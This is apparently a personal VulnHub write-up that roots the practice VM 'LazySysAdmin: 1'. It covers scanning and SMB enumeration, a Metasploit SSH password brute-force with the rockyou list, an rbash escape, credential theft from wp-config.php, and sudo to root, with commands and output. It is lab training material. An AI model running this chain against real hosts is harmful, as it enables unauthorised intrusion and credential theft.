Back once again with another vulnhub writeup, you guys seem to like these and a load of new VM’s were added that currently don’t have any.
As you can tell by the title this one is for “LazySysAdmin: 1”
My setup is as follows:
Attacker: 192.168.1.135
Target: 192.168.1.142
Firstly I did a portscan, this revealed the following:
22/tcp open ssh syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql syn-ack ttl 64 MySQL (unauthorized)
6667/tcp open irc syn-ack ttl 64 InspIRCd
being a web guy the first thing I did was load up a browser, burp suite and browse the site. Not much of interest was there. So launched Nikto and dirb.
These found some folders that had directory listing enabled, but no useful content.
/info.php contained phpinfo();
/wordpress/ had a wordpress blog
/phpmyadmin/ contained phpmyadmin
I then fired wpscan against /wordpress/ with nothing useful found except a username of “admin”.
I then ran enum4linux against the box which revealed the following:
Looking up status of 192.168.1.142 LAZYSYSADMIN <00> - B Workstation Service LAZYSYSADMIN <03> - B Messenger Service LAZYSYSADMIN <20> - B File Server Service WORKGROUP <00> - B Domain/Workgroup Name WORKGROUP <1e> - B Browser Service Elections [+] Got OS info for 192.168.1.142 from srvinfo: LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server platform_id : 500 os version : 6.1 server type : 0x809a03 //192.168.1.142/print$ Mapping: DENIED, Listing: N/A//192.168.1.142/share$ Mapping: OK, Listing: OK//192.168.1.142/IPC$ Mapping: OK Listing: DENIEDS-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)S-1-22-1-1000 Unix User\togie (Local User) |
The most useful here being the username of “togie”
On a hunch I decided to try to bruteforce the SSH service with this username:
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.142RHOSTS => 192.168.1.142msf auxiliary(ssh_login) > set USERNAME togieUSERNAME => togiemsf auxiliary(ssh_login) > set STOP_ON_SUCCESS trueSTOP_ON_SUCCESS => truemsf auxiliary(ssh_login) > set PASS_FILE /opt/wordlists/rockyou.txtPASS_FILE => /opt/wordlists/rockyou.txtmsf auxiliary(ssh_login) > run[+] 192.168.1.142:22 - Success: 'togie:12345' 'uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux '[*] 192.168.1.142 - Command shell session 1 closed. Reason: Died from EOFError[*] Command shell session 1 opened (192.168.1.135:36709 -> 192.168.1.142:22) at 2017-10-05 16:09:05 +0100[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed |
well that was easy! after SSHing in it quickly became apparent that I was in a restricted “rbash” shell.. this was trivial to break out of:
togie@LazySysAdmin:~$ cd ..-rbash: cd: restrictedtogie@LazySysAdmin:~$ bashtogie@LazySysAdmin:~$ cd ..togie@LazySysAdmin:/home$ |
from there I was able to read the wp-config.php files and gain access to phpmyadmin and wordpress (both used the same credentials), there were some other files of note in the webroot which I really should have found earlier!
Time to get root. I fired up “python -m SimpleHTTPServer” on my attacker VM and on the victim ssh downloaded linuxprivchecker.py and LinEnum.sh
After running them it quickly became apparent the user had sudo privs. A quick “sudo sh” and viola I was root. cd to /root and see proof.txt
root@LazySysAdmin:~# cat proof.txtWX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851Well done :)Hope you learn't a few things along the way.Regards,Togie McdogieEnjoy some random stringsWX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT98512d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu |
All in all this was a fun boot2root, thanks @togiemcdogie